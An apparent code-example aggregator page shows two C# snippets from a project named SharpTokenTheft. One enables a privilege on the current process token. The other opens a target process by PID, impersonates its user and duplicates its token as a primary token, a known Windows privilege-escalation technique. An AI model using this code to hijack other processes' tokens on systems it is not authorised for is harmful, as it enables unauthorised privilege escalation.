C# (CSharp) SharpTokenTheft Pinvoke.OpenProcessToken Examples

Programming Language: C# (CSharp)

Namespace/Package Name: SharpTokenTheft

Class/Type: Pinvoke

Method/Function: OpenProcessToken

Examples at hotexamples.com: 2

C# (CSharp) SharpTokenTheft Pinvoke.OpenProcessToken - 2 examples found. These are the top rated real world C# (CSharp) examples of SharpTokenTheft.Pinvoke.OpenProcessToken extracted from open source projects. You can rate examples to help us improve the quality of examples.

Frequently Used Methods

Show Hide

OpenProcessToken(2)

AdjustTokenPrivileges(1)

CreateProcessWithTokenW(1)

DuplicateTokenEx(1)

GetCurrentProcess(1)

GetTokenInformation(1)

ImpersonateLoggedOnUser(1)

LookupPrivilegeValue(1)

OpenProcess(1)

PrivilegeCheck(1)

RevertToSelf(1)

Example #1

Show file

 public static bool AdjustTokenPrivilege(string priv)
 {
     try {
         Pinvoke.PTOKEN_PRIVILEGES tPriv;
         IntPtr hProc   = Pinvoke.GetCurrentProcess();
         IntPtr tHandle = IntPtr.Zero;
         if (Pinvoke.OpenProcessToken(hProc, Pinvoke.TOKEN_ADJUST_PRIVILEGES | Pinvoke.TOKEN_QUERY, ref tHandle))
         {
             tPriv.Count = 1;
             tPriv.Luid  = 0;
             tPriv.Attr  = Pinvoke.SE_PRIVILEGE_ENABLED;
             Pinvoke.LookupPrivilegeValue(null, priv, ref tPriv.Luid);
             Pinvoke.PRIVILEGE_SET privs = new Pinvoke.PRIVILEGE_SET {
                 Privilege = new Pinvoke.LUID_AND_ATTRIBUTES[1], Control = Pinvoke.PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY, PrivilegeCount = 1
             };
             privs.Privilege[0].Luid       = tPriv.Luid;
             privs.Privilege[0].Attributes = Pinvoke.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED;
             bool privCheck;
             Pinvoke.PrivilegeCheck(tHandle, ref privs, out privCheck);
             if (!privCheck)
             {
                 Console.WriteLine("[*] Trying to adjust token for privilege '{0}'!", priv);
                 if (Pinvoke.AdjustTokenPrivileges(tHandle, false, ref tPriv, 0, IntPtr.Zero, IntPtr.Zero))
                 {
                     Console.WriteLine("[+] Success adjusting privilege to '{0}'!", priv);
                     return(true);
                 }
             }
             else
             {
                 Console.WriteLine("[+] Process token already have '{0}'!", priv);
                 return(true);
             }
         }
     } catch (Exception ex) {
         throw ex;
     }
     Console.WriteLine("[-] Error adjusting privilege {0}", Marshal.GetLastWin32Error());
     return(false);
 }

Example #2

Show file

        public static IntPtr PrimaryTokenTheft(int pid)
        {
            IntPtr PrimaryToken = new IntPtr();
            IntPtr hProcess     = Pinvoke.OpenProcess(Pinvoke.ProcessAccessFlags.QueryInformation, true, pid);

            if (hProcess != IntPtr.Zero)
            {
                IntPtr tokenHandle = new IntPtr();
                if (Pinvoke.OpenProcessToken(hProcess, Pinvoke.TOKEN_DUPLICATE | Pinvoke.TOKEN_ASSIGN_PRIMARY | Pinvoke.TOKEN_QUERY, ref tokenHandle))
                {
                    if (Pinvoke.ImpersonateLoggedOnUser(tokenHandle))
                    {
                        if (Pinvoke.DuplicateTokenEx(tokenHandle, Pinvoke.TOKEN_ADJUST_DEFAULT | Pinvoke.TOKEN_ADJUST_SESSIONID | Pinvoke.TOKEN_QUERY | Pinvoke.TOKEN_DUPLICATE | Pinvoke.TOKEN_ASSIGN_PRIMARY, IntPtr.Zero, 2, Pinvoke.TOKEN_TYPE.TokenPrimary, out PrimaryToken))
                        {
                            Console.WriteLine("[+] Success duplicating primary token!");
                            return(PrimaryToken);
                        }
                    }
                }
            }

            Console.WriteLine("[-] Error impersonating process token! ({0})", Marshal.GetLastWin32Error());
            return(IntPtr.Zero);
        }